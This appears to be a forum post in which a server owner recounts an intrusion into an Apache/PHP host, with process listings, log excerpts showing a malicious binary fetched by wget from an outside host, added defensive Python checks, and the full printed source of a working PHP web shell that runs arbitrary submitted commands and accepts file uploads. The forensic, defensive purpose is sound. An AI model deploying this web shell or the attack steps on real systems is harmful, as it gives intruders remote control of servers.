Yes, unSpawn, the world-writable thing is the thing.
I have all the stuff from the attack.
Can I publish the php scripts here?
The munitions seem to be:
Code:
helios exploit # ./httpd --help
./httpd: invalid option -- '-'
iroffer v1.4.b01 [20040901211948] by PMG, see http://iroffer.org/
(..)
helios exploit # ./x --help
XHide - Process Faker, by Schizoprenic Xnuxer Research (c) 2002
...follows:
Code:
helios exploit # cat murqdh.php
<
and a large and evil looking script that begins thus:
Code:
helios exploit # cat rfrcew.php
This combination seems to have unleashed a torrent of data initiated by my server against a very nearby one (one route away) that expended 40G in less than 5 min; the host noticed and took my ports offline.
I monitored top and netstat to see if I could work out what was going on before I started stopping things... (ssh'd via my iLO)
Apache was at full throttle:
Code:
top - 19:54:25 up 29 days, 21:20, 1 user, load average: 1.00, 1.01, 1.00
Tasks: 127 total, 2 running, 124 sleeping, 0 stopped, 1 zombie
Cpu(s): 0.0%us, 50.0%sy, 0.0%ni, 50.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Mem: 3630412k total, 2963236k used, 667176k free, 524328k buffers
Swap: 1959920k total, 156k used, 1959764k free, 1771116k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
16043 apache 20 0 1768 304 188 R 165 0.0 78:29.10 httpd
1 root 20 0 1636 544 476 S 0 0.0 0:17.67 init
2 root 15 -5 0 0 0 S 0 0.0 0:00.00 kthreadd
3 root RT -5 0 0 0 S 0 0.0 0:03.05 migration/0
4 root 15 -5 0 0 0 S 0 0.0 3:31.88 ksoftirqd/0
5 root RT -5 0 0 0 S 0 0.0 0:04.58 watchdog/0
6 root RT -5 0 0 0 S 0 0.0 0:01.35 migration/1
7 root 15 -5 0 0 0 S 0 0.0 3:18.87 ksoftirqd/1
8 root RT -5 0 0 0 S 0 0.0 0:00.17 watchdog/1
9 root RT -5 0 0 0 S 0 0.0 0:02.83 migration/2
10 root 15 -5 0 0 0 S 0 0.0 3:18.46 ksoftirqd/2
11 root RT -5 0 0 0 S 0 0.0 0:00.16 watchdog/2
12 root RT -5 0 0 0 S 0 0.0 0:01.25 migration/3
13 root 15 -5 0 0 0 S 0 0.0 3:03.70 ksoftirqd/3
14 root RT -5 0 0 0 S 0 0.0 0:00.15 watchdog/3
15 root 15 -5 0 0 0 S 0 0.0 0:14.90 events/0
16 root 15 -5 0 0 0 S 0 0.0 0:17.40 events/1
17 root 15 -5 0 0 0 S 0 0.0 0:13.38 events/2
BTW that is probably 100%, with the watch chopping off at 65%.
I stopped apache2 and went looking for recent files:
Code:
find /var/www/ -type f -printf '%TY-%Tm-%Td %TT %p\n' | sort
This showed the offending files straight away, modified at the start of the attack. They didn't plant and wait; they must have dumped the munitions and initiated the sequence immediately.
Once I saw the httpd binary I knew it would show in the Apache logs:
Code:
helios apache2 # grep httpd ./*
./error_log:==> Fakename: /usr/local/apache/bin/httpd -DSSL PidNum: 5908
./error_log:--2009-08-05 18:20:33-- http://lichno.net/step/phpThumb/cache/a/ad/a/httpd
./error_log:Saving to: `httpd'
./error_log:2009-08-05 18:20:54 (15.1 KB/s) - `httpd' saved [306414/306414]
And there it was, at the time of the launch of the attack...
Finally, here is the process list at the time the attack was going (but disconnected):
Code:
helios logs-n-snips # cat ps
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1636 544 ? Ss Jul06 0:17 init [3]
root 2 0.0 0.0 0 0 ? S< Jul06 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S< Jul06 0:03 [migration/0]
root 4 0.0 0.0 0 0 ? S< Jul06 3:31 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< Jul06 0:04 [watchdog/0]
root 6 0.0 0.0 0 0 ? S< Jul06 0:01 [migration/1]
root 7 0.0 0.0 0 0 ? S< Jul06 3:18 [ksoftirqd/1]
root 8 0.0 0.0 0 0 ? S< Jul06 0:00 [watchdog/1]
root 9 0.0 0.0 0 0 ? S< Jul06 0:02 [migration/2]
root 10 0.0 0.0 0 0 ? S< Jul06 3:18 [ksoftirqd/2]
root 11 0.0 0.0 0 0 ? S< Jul06 0:00 [watchdog/2]
root 12 0.0 0.0 0 0 ? S< Jul06 0:01 [migration/3]
root 13 0.0 0.0 0 0 ? S< Jul06 3:03 [ksoftirqd/3]
root 14 0.0 0.0 0 0 ? S< Jul06 0:00 [watchdog/3]
root 15 0.0 0.0 0 0 ? S< Jul06 0:14 [events/0]
root 16 0.0 0.0 0 0 ? S< Jul06 0:17 [events/1]
root 17 0.0 0.0 0 0 ? S< Jul06 0:13 [events/2]
root 18 0.0 0.0 0 0 ? S< Jul06 0:17 [events/3]
root 19 0.0 0.0 0 0 ? S< Jul06 0:00 [khelper]
root 106 0.0 0.0 0 0 ? S< Jul06 0:02 [kblockd/0]
root 107 0.0 0.0 0 0 ? S< Jul06 0:01 [kblockd/1]
root 108 0.0 0.0 0 0 ? S< Jul06 0:01 [kblockd/2]
root 109 0.0 0.0 0 0 ? S< Jul06 0:01 [kblockd/3]
root 111 0.0 0.0 0 0 ? S< Jul06 0:00 [kacpid]
root 112 0.0 0.0 0 0 ? S< Jul06 0:00 [kacpi_notify]
root 186 0.0 0.0 0 0 ? S< Jul06 0:00 [ata/0]
root 187 0.0 0.0 0 0 ? S< Jul06 0:00 [ata/1]
root 188 0.0 0.0 0 0 ? S< Jul06 0:00 [ata/2]
root 189 0.0 0.0 0 0 ? S< Jul06 0:00 [ata/3]
root 190 0.0 0.0 0 0 ? S< Jul06 0:00 [ata_aux]
root 191 0.0 0.0 0 0 ? S< Jul06 0:00 [ksuspend_usbd]
root 196 0.0 0.0 0 0 ? S< Jul06 0:00 [khubd]
root 199 0.0 0.0 0 0 ? S< Jul06 0:00 [kseriod]
root 258 0.0 0.0 0 0 ? S Jul06 2:53 [pdflush]
root 259 0.0 0.0 0 0 ? S< Jul06 0:11 [kswapd0]
root 300 0.0 0.0 0 0 ? S< Jul06 0:00 [aio/0]
root 301 0.0 0.0 0 0 ? S< Jul06 0:00 [aio/1]
root 302 0.0 0.0 0 0 ? S< Jul06 0:00 [aio/2]
root 303 0.0 0.0 0 0 ? S< Jul06 0:00 [aio/3]
root 998 0.0 0.0 0 0 ? S< Jul06 0:00 [khpsbpkt]
root 1039 0.0 0.0 0 0 ? S< Jul06 0:00 [kpsmoused]
root 1043 0.0 0.0 0 0 ? S< Jul06 0:00 [kstriped]
root 1045 0.0 0.0 0 0 ? S< Jul06 0:00 [kondemand/0]
root 1046 0.0 0.0 0 0 ? S< Jul06 0:00 [kondemand/1]
root 1047 0.0 0.0 0 0 ? S< Jul06 0:00 [kondemand/2]
root 1048 0.0 0.0 0 0 ? S< Jul06 0:00 [kondemand/3]
root 1060 0.0 0.0 0 0 ? S< Jul06 0:00 [rpciod/0]
root 1061 0.0 0.0 0 0 ? S< Jul06 0:00 [rpciod/1]
root 1062 0.0 0.0 0 0 ? S< Jul06 0:00 [rpciod/2]
root 1063 0.0 0.0 0 0 ? S< Jul06 0:00 [rpciod/3]
root 1071 0.0 0.0 0 0 ? S< Jul06 1:24 [kjournald]
root 1175 0.0 0.0 1896 604 ? S<s Jul06 0:09 /sbin/udevd --daemon
root 2251 0.0 0.0 0 0 ? S< Jul06 3:54 [kjournald]
root 2252 0.0 0.0 0 0 ? S< Jul06 0:00 [kjournald]
root 2253 0.0 0.0 0 0 ? S< Jul06 0:04 [kjournald]
root 2875 0.0 0.0 3456 1340 ? Ss Jul06 0:49 /usr/sbin/syslog-ng
amavis 4010 0.0 1.4 60168 51516 ? Ss Jul06 0:25 amavisd (master)
root 4356 0.0 0.0 4204 912 ? Ss Jul06 0:00 /usr/sbin/sshd
root 4532 0.0 0.0 1904 708 ? Ss Jul06 0:02 /usr/sbin/cron
clamav 4647 0.0 3.5 155604 127988 ? SNsl Jul13 9:42 /usr/sbin/clamd
clamav 4657 0.0 0.0 3048 1400 ? SNs Jul13 0:04 /usr/bin/freshclam -d
apache 4835 0.0 0.3 25456 13516 ? S 17:46 0:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
mysql 5576 6.6 1.9 188284 69712 ? Ssl Jul06 2875:49 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock
root 5719 0.0 0.0 1620 408 ? S Jul06 0:00 /usr/sbin/courierlogger -pid=/var/run/authdaemon.pid -start /usr/lib/courier/courier-authlib/authdaemond
root 5720 0.0 0.0 5276 1228 ? S Jul06 0:00 /usr/lib/courier/courier-authlib/authdaemond
root 5724 0.0 0.0 5500 1436 ? S Jul06 0:02 /usr/lib/courier/courier-authlib/authdaemond
root 5725 0.0 0.0 5500 1436 ? S Jul06 0:02 /usr/lib/courier/courier-authlib/authdaemond
root 5726 0.0 0.0 5500 1436 ? S Jul06 0:02 /usr/lib/courier/courier-authlib/authdaemond
root 5727 0.0 0.0 5500 1440 ? S Jul06 0:02 /usr/lib/courier/courier-authlib/authdaemond
root 5728 0.0 0.0 5500 1436 ? S Jul06 0:02 /usr/lib/courier/courier-authlib/authdaemond
root 5792 0.0 0.0 1716 524 ? S Jul06 0:02 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/courierlogger -stderrloggername=imapd -maxprocs=40 -maxperip=4 -pid=/var/run/imapd.pid -nodnslookup -noidentlookup 143 /usr/sbin/imaplogin /usr/lib/courier-imap/courier-imapd.indirect Maildir
root 5795 0.0 0.0 1620 476 ? S Jul06 0:02 /usr/lib/courier-imap/courierlogger imapd
root 5856 0.0 0.0 1716 516 ? S Jul06 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/courierlogger -stderrloggername=pop3d -maxprocs=40 -maxperip=4 -pid=/var/run/pop3d.pid -nodnslookup -noidentlookup 110 /usr/sbin/pop3login /usr/lib/courier-imap/courier-pop3d.indirect .maildir
root 5859 0.0 0.0 1488 320 ? S Jul06 0:00 /usr/lib/courier-imap/courierlogger pop3d
apache 5908 0.0 0.0 0 0 ? Z 17:48 0:00 [httpd] <defunct>
apache 5909 0.0 0.0 1768 640 ? S 17:48 0:00 [httpd]
root 5914 0.0 0.0 1844 468 ? Ss Jul06 0:00 /usr/sbin/gpm -m /dev/input/mice -t ps2
root 6237 0.3 0.0 100576 1040 ? Ssl Jul06 132:51 hpasmd
root 6278 0.0 0.0 2492 1412 ? S Jul06 0:14 cmathreshd -p 5 -s OK
root 6282 0.0 0.0 10624 1376 ? S Jul06 12:19 cmahostd -p 15 -s OK
root 6287 0.0 0.0 10692 1240 ? Sl Jul06 0:02 cmapeerd
root 6327 0.0 0.0 18332 916 ? Sl Jul06 0:18 cmastdeqd -p 30
root 6334 0.0 0.0 51148 844 ? Sl Jul06 2:24 cmahealthd -p 30 -s OK -t OK -i
root 6474 0.0 0.0 10092 788 ? S Jul06 0:05 cmaided -p 15 -s OK
root 6482 0.0 0.0 1880 596 ? S Jul06 0:01 cmascsid -p 15 -s OK
root 6499 0.0 0.0 1868 564 ? S Jul06 0:01 cmasasd -p 15 -s OK
106 7126 0.3 0.4 43868 17344 ? Ssl Jul06 131:23 /usr/bin/memcached -d -p 11211 -l 127.0.0.1 -m 512 -c 1024 -u memcached -P /var/run/memcached/memcached-11211.pid
ntop 7186 0.3 1.2 122724 43984 ? Ssl Jul06 170:41 /usr/bin/ntop -d -L -u ntop -P /var/lib/ntop
root 7350 0.0 0.0 2064 524 ? Ss Jul06 0:00 /usr/sbin/saslauthd -a rimap -r -O localhost
root 7351 0.0 0.0 2064 484 ? S Jul06 0:00 /usr/sbin/saslauthd -a rimap -r -O localhost
root 7352 0.0 0.0 2064 488 ? S Jul06 0:00 /usr/sbin/saslauthd -a rimap -r -O localhost
root 7353 0.0 0.0 2064 484 ? S Jul06 0:00 /usr/sbin/saslauthd -a rimap -r -O localhost
root 7354 0.0 0.0 2064 484 ? S Jul06 0:00 /usr/sbin/saslauthd -a rimap -r -O localhost
amavis 7400 0.0 1.4 62828 53656 ? S 15:59 0:02 amavisd (ch7-avail)
root 7416 0.0 0.7 30012 27724 ? Ss Jul06 5:42 /usr/sbin/spamd -d -r /var/run/spamd.pid -m 5 -c -H
root 7584 0.0 0.7 30012 25992 ? S Jul06 0:01 spamd child
root 7585 0.0 0.7 30012 25900 ? S Jul06 0:02 spamd child
apache 9392 0.1 0.3 27060 13772 ? S 18:28 0:07 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
root 9493 0.0 0.1 18308 5984 ? Sl Jul06 4:10 /usr/sbin/snmpd -p /var/run/snmpd.pid
root 9616 0.0 0.0 2596 1240 tty1 Ss Jul06 0:00 /bin/login --
root 9617 0.0 0.0 1632 460 tty2 Ss+ Jul06 0:00 /sbin/agetty 38400 tty2 linux
root 9618 0.0 0.0 1632 456 tty3 Ss+ Jul06 0:00 /sbin/agetty 38400 tty3 linux
root 9619 0.0 0.0 1632 460 tty4 Ss+ Jul06 0:00 /sbin/agetty 38400 tty4 linux
root 9620 0.0 0.0 1632 464 tty5 Ss+ Jul06 0:00 /sbin/agetty 38400 tty5 linux
root 9621 0.0 0.0 1632 460 tty6 Ss+ Jul06 0:00 /sbin/agetty 38400 tty6 linux
apache 10292 0.0 0.3 24664 12780 ? S 18:29 0:04 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
root 10673 0.0 0.0 7012 1812 ? Ss Jul07 0:33 /usr/lib/postfix/master
postfix 10677 0.0 0.0 7348 2164 ? S Jul07 0:17 qmgr -l -t fifo -u
apache 12108 0.0 0.3 24548 12684 ? S 18:31 0:04 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
apache 12505 0.0 0.3 24528 12644 ? S 18:32 0:04 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
apache 12686 0.1 0.3 25048 13200 ? S 18:32 0:04 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
apache 13889 0.1 0.3 24988 13092 ? S 18:33 0:04 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
amavis 14711 0.0 1.6 69208 60208 ? S 12:36 0:06 amavisd (ch19-avail)
apache 15948 0.0 0.3 27176 14220 ? S 18:35 0:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
apache 16020 0.0 0.3 24792 12896 ? S 18:35 0:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
apache 16043 99.9 0.0 1768 304 ? R 18:35 69:33 [httpd]
apache 16221 0.0 0.3 24640 12764 ? S 18:38 0:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
postfix 16745 0.0 0.0 7056 1744 ? S 18:53 0:00 pickup -l -t fifo -u
apache 17268 0.0 0.3 23924 11988 ? S 19:10 0:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
1000 18266 0.0 0.0 3008 1572 tty1 S 19:42 0:00 -bash
root 18302 0.0 0.0 2488 1152 tty1 S 19:43 0:00 su
root 18303 0.0 0.0 2880 1588 tty1 S 19:43 0:00 bash
postfix 18370 0.0 0.0 7196 2000 ? S 19:44 0:00 smtp -t unix -u
root 18389 0.0 0.0 2276 888 tty1 R+ 19:45 0:00 ps aux
root 28969 0.0 0.0 0 0 ? S Aug03 0:16 [pdflush]
root 29674 0.0 0.3 22204 11516 ? Ss Jul07 22:40 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SSL -D SSL_DEFAULT_VHOST -D PHP5 -d /usr/lib/apache2 -f /etc/apache2/httpd.conf -k start
named 29761 0.0 0.5 22592 19764 ? Ss Jul07 4:38 /usr/sbin/named -u named -n 4 -t /var/chroot/dns
nobody 29798 0.0 0.0 6336 1440 ? Ss Jul23 0:16 proftpd: (accepting connections)
Thanks for your interest unSpawn.
Cheers,
\\'
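As an added example (not part of this thread or anything the poster ran), two defender-side checks in Python built from the evidence above: a ps-listing parser that flags a user-space process posing as a bracketed kernel thread, which is what the XHide "process faker" did with [httpd], and an error_log scanner that recovers the wget transfer the grep revealed. Both sample inputs are constructed to match the shapes in the post, and the download hostname is a placeholder.

```python
import re

# Constructed ps aux sample modelled on the listing in the post (not copied verbatim).
PS_SAMPLE = """\
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 4 0.0 0.0 0 0 ? S< Jul06 3:31 [ksoftirqd/0]
apache 9392 0.1 0.3 27060 13772 ? S 18:28 0:07 /usr/sbin/apache2 -k start
apache 5908 0.0 0.0 0 0 ? Z 17:48 0:00 [httpd] <defunct>
apache 16043 99.9 0.0 1768 304 ? R 18:35 69:33 [httpd]
"""

# Constructed error_log excerpt in the shape wget leaves on stderr; host is a placeholder.
ERROR_LOG_SAMPLE = """\
--2009-08-05 18:20:33--  http://attacker.invalid/step/cache/httpd
Saving to: `httpd'
2009-08-05 18:20:54 (15.1 KB/s) - `httpd' saved [306414/306414]
"""

def fake_kernel_threads(ps_text):
    """Flag bracketed COMMAND entries that cannot be kernel threads.
    ps brackets a name when /proc/<pid>/cmdline is empty: genuine kernel
    threads (owned by root, VSZ 0) and zombies. Anything else with a bracketed
    name has overwritten its own argv, as XHide-style process fakers do."""
    hits = []
    for line in ps_text.splitlines()[1:]:          # skip the header row
        f = line.split(None, 10)
        if len(f) < 11:
            continue
        user, pid, vsz, stat, cmd = f[0], int(f[1]), int(f[4]), f[7], f[10]
        # zombies are bracketed too, so on their own they are not evidence
        if not cmd.startswith("[") or stat.startswith("Z"):
            continue
        if user != "root" or vsz != 0:
            hits.append((user, pid, cmd))
    return hits

WGET_BANNER = re.compile(r"--(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)--\s+(\S+)")
WGET_SAVED = re.compile(r"`([^']+)' saved \[(\d+)/(\d+)\]")

def wget_downloads(log_text):
    """Pair each wget banner line with the matching "saved" line.
    wget prints progress to stderr, so a web shell running it leaves these
    lines in Apache's error_log. Returns (timestamp, url, local_name, bytes)."""
    found, pending = [], None
    for line in log_text.splitlines():
        m = WGET_BANNER.search(line)
        if m:
            pending = (m.group(1), m.group(2))
            continue
        m = WGET_SAVED.search(line)
        if m and pending:
            found.append((pending[0], pending[1], m.group(1), int(m.group(2))))
            pending = None
    return found
```

Run the ps check against `ps aux` output captured before the box is cleaned, and the log check against every error_log in the web server's log directory, since the grep in the post only hit because the attacker's binary happened to be called httpd.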
Oh, and one more I missed:
Code:
helios exploit # cat errors.php
<body bgcolor="#C0C0C0">Carnivores Team We Own The Net!
<?php
set_magic_quotes_runtime(0);
print "<style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}</style>";
print "<center><h1>Team Carnivores</h1></center>";
print "<hr><hr>";
$currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
$UName = `uname -a`;
$SCWD = `pwd`;
$UserID = `id`;
if( $currentWD == "" ) {
$currentWD = $SCWD;
}
print "<table>";
print "<tr><td><b>My IP:</b></td><td>".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")</td></tr>";
print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td></tr>";
print "<tr><td><b>uname -a:</b></td><td>$UName</td></tr>";
print "<tr><td><b>ID:</b></td><td>$UserID</td></tr>";
print "</table>";
print "<hr><hr>";
if( $_POST['_act'] == "List files!" ) {
$currentCMD = "ls -la";
}
print "<form method=post enctype=\"multipart/form-data\"><table>";
print "<tr><td><b>CMD:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
print "<td><input type=submit name=_act value=\"Shoot!\"></td></tr>";
print "<tr><td><b>PWD:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
print "<td><input type=submit name=_act value=\"ls -al\"></td></tr>";
print "<tr><td><b>Inject:</b></td><td><input size=85 type=file name=_upl></td>";
print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
print "</table></form><hr><hr>";
$currentCMD = str_replace("\\\"","\"",$currentCMD);
$currentCMD = str_replace("\\\'","\'",$currentCMD);
if( $_POST['_act'] == "Upload!" ) {
if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
print "<center><b>fuckers blocked us try again!</b></center>";
} else {
print "<center><pre>";
system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
print "</pre><b>File uploaded baby good work!</b></center>";
}
} else {
print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
$currentCMD = "cd ".$currentWD.";".$currentCMD;
system($currentCMD);
print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>ownd Baby</b></center>";
}
exit;
?>
helios exploit #